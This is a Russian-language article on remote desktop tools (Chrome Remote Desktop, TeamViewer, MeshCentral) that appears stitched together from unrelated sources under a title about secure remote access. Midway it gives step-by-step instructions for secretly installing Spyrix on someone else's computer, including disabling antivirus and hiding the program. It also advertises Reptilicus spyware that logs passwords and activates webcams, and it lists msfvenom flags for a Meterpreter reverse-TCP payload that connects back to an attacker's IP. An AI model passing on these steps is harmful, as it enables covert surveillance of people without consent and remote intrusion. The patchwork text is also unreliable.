Безопасный удалённый доступ: как защитить инфраструктуру от злодеев и нерадивых сотрудников
Если вы настраиваете удалённый доступ к инфраструктуре, важно не только предоставить всем сотрудникам подключение к нужным им сервисам, но и позаботиться о безопасности. Те, кто занимались сетевыми взломами, воспользовались повсеместным переходом на удалённую работу из-за пандемии. Вместо уязвимостей в межсетевом экране и периметре рабочей сети, появилось огромное количество уязвимостей на домашних рабочих станциях. Расскажу, как от них защититься и настроить безопасный удалённый доступ.
- TeamViewer и другие программы для удалённого доступа
- Клиент-серверной подключение
- Zero Trust
- Аренда облачных мощностей
- Защита от инсайдерских угроз
- Как настроить безопасный удалённый доступ
Выбор программы для создания удаленного рабочего стола
Итак, всего существуют несколько программ, позволяющих создать «компьютерный пульт». Зайдя в Pay маркет, можно увидеть целый список разнообразных приложений для создания удаленного рабочего стола:
Есть как достаточно известные приложения, такие как: TeamViewer, Remote Desktop от Microsoft и Удаленный рабочий стол Chrome от Google; но существуют и малоизвестные «пульты», скачивать и взаимодействовать с которыми я бы не решился. Мой выбор, собственно, пал на Удаленный рабочий стол Chrome от Google, потому что это наиболее простой в освоении, установке и использовании «пульт». На самом деле, пользуюсь я им уже около двух лет и проблем не наблюдалось как на iPhone под операционной системой IOS, так и на Android-смартфоне. Ну и если это продукт Google, то я не беспокоюсь за сохранность своих данных, ведь корпорация большая, а выпускать некачественный продукт для них просто непозволительно.
реклама
Но вы, собственно, можете выбрать для себя любой другой удаленный рабочий стол, я думаю, что процесс установки у них идентичен. А я же, собственно, приступаю к установке программы и ее настройке.
Как бесплатно шпионить за чужим компьютером без его ведома
В этом разделе я покажу вам, как использовать Spyrix для слежки за чьим-либо компьютером без его ведома.
Шаг 1 Зарегистрируйтесь в Spyrix
Чтобы использовать Spyrix, вам необходимо создать учетную запись программы. Нажмите кнопку, чтобы зарегистрироваться в Spyrix, указав свой адрес электронной почты.
Шаг 2 Загрузите Spyrix на целевой компьютер
После регистрации учетной записи на целевом компьютере запустите Официальный сайт Спирикс и нажмите кнопку «Загрузить», чтобы установить программу Spyrix на компьютер.
Установите его после завершения загрузки. Во время установки мастер предложит вам введите адрес электронной почты. Введите тот, который вы используете для создания учетной записи Spyrix.
сторонний антивирус на целевом компьютере может заблокировать эту ссылку или ограничить установку. Отключить антивирус на некоторое время и повторно активируйте его после завершения процесса.
После завершения установки запустите приложение на целевом компьютере. Там, в интерфейсе, нажмите на Спрятать.
Таким образом, Spyrix будет скрыт в панели задач, и только вы будете знать, что за этим компьютером ведется слежка.
Шаг 3 Следите за целевым компьютером
Отныне вы можете следить за компьютером и видеть все действия на экране, просматривая видео наблюдения на Spyrix.
Войти Официальный сайт Спирикс и нажмите Моя учетная запись. Выберите целевой компьютер и следите за ним в режиме реального времени.
Что такое удаленный доступ к компьютеру через другой компьютер?
Если вкратце, то удаленный доступ к компьютеру через другой компьютер – это возможность следить за работой компьютера в онлайн режиме издалека со своего ПК. Программа для удаленного доступа к компьютеру Reptilicus позволит вам через свой компьютер:
- получить доступ к рабочему столу другого компьютера;
- удаленно включать его веб-камеру;
- видеть с какими документами работал пользователь (создавал, исправлял, дополнял, сохранял, удалял);
- знать когда заходил пользователь в Интернет;
- видеть какие сайты посещал пользователь;
- знать о чем и с кем он переписывался через Интернет;
- видеть какие документы распечатывались на принтере (текст и количество страниц);
- получать абсолютно все нажатия клавиш (даже пароли);
- и многое другое.
Установив нашу программу, вы будете видеть все, что делает ребенок на своем ноутбуке или сотрудники на своих рабочих компьютерах. Также вы можете установить программу на свой домашний компьютер, и знать чем занимаются на нем ваши родные и близкие, пока вас нет дома.
Как создать полезную нагрузку
Для генерации полезной нагрузки обязательными являются два флага: -p and -f.
- -p windows/meterpreter/reverse_tcp – выбранный тип полезной нагрузки
- lhost=IP_атакующего – адрес атакующего, для обратного соединения с компьютера жертвы
- lport=4444 – порт, к которому будет делаться обратное соединение
- -f exe – формат полезной нагрузки (исполнимый файл Windows)
- -o /tmp/my_payload.exe – сохранить сгенерированный код в указанный файл
Как это работает
Для начала на оба компьютера нужно установить специальную программу. Удаленное управление возможно выполнять и со смартфона или планшета, но это менее удобно по разным причинам. Также есть варианты программ, не требующих установки, но они будут иметь определенные ограничения прав доступа. В любом случае, на устройства нужно устанавливать одинаковое ПО. И обязательным условием является подключение обоих компьютеров к интернету. После установки каждой машине программа присваивает определенный номер (ID) и код (пароль).
(на фото на заднем плане рабочий стол ПК, с которого осуществляется удаленное управление, а в открытом окне рабочий стол удаленного компьютера, на котором запущена программа TeamViewer 14.)
Для того чтобы подключиться к удаленному компьютеру, на обеих машинах запускается установленная программа. Пользователь, ПК которого необходимо настроить, должен сообщить идентификационные данные (ID и пароль), назначенные программой, тому, кто будет настраивать его машину (например, вам). Вы вводите полученные ID и пароль машины, которую будете настраивать, в своей программе и подключаетесь к ПК, находящемуся в другом месте (кабинете/городе/стране).
На экране вашего компьютера откроется окно, на котором будет отображен рабочий стол другой машины. И вы сможете управлять им (настраивать, открывать-закрывать папки, устанавливать-удалять программы и т. д.) как своим собственным.
MeshCentral
Еще один open source проект для удаленного доступа к компьютерам — MeshCentral. Для соединения устройств между собой можно использовать как публичные серверы, так и свой собственный. Серверная часть написана на NodeJS, так что ставится и запускается достаточно просто. Пример для Linux:
Под Windows есть готовый установщик, который автоматом поставит NodeJS и сам сервер MeshCentral.
Управление удаленными хостами производится через браузер. Это отличает MeshCentral от многих похожих систем. Из бесплатных мне вообще подобные неизвестны.
В локальной сети агенты сами мультикастом находят сервер. В остальных случаях в настройках агента нужно будет указать адрес сервера, для того, чтобы через него можно было организовать соединение. Помимо непосредственно доступа к экрану компьютера, можно посмотреть информацию о железе, подключиться к консоли, посмотреть графики загрузки cpu и памяти, передать файлы.
В Youtube есть подробная серия роликов по всевозможной настройке. Там всё, что только можно — непосредственно установка сервера, двухфакторная авторизация, работа через nginx reverse proxy, настройка сертификатов Let’s Encrypt и многое другое. Необычно видеть для open source проекта такую подробную серию роликов.
Развернуть и попробовать MeshCentral очень просто. Достаточно установить сервер. Зайти на него через web интерфейс. Выбрать агента под свою операционную систему и установить. Есть поддержка мобильных устройств. После установки агента, к хосту можно подключаться из панели управления.
Если кто-то использует MeshCentral у себя, дайте обратную связь. Как этот софт в реальной эксплуатации. На вид выглядит очень удобно. Я сам использую коммерческий софт для удаленного управления компьютерами через браузер. Покупаю его как сервис.
Google Hangouts: шеринг экрана и видеоконференции
Как крайнюю меру можно использовать новый сервис от Google — Hangouts. Он позволяет устраивать видеовстречи, во время которых пользователи могут демонстрировать друг другу свой экран. При желании можешь ознакомиться с этим сервисом самостоятельно.
Программ для удаленного доступа очень много. Как я, надеюсь, показал, самый привычный инструмент не всегда самый эффективный. Нужно отталкиваться от условий конкретной задачи, целевых платформ и других факторов. Надеюсь, теперь я окончательно прояснил всю картину удаленного доступа в твоей голове. Все предложения и пожелания можешь отправлять на dhsilabs@mail.ru.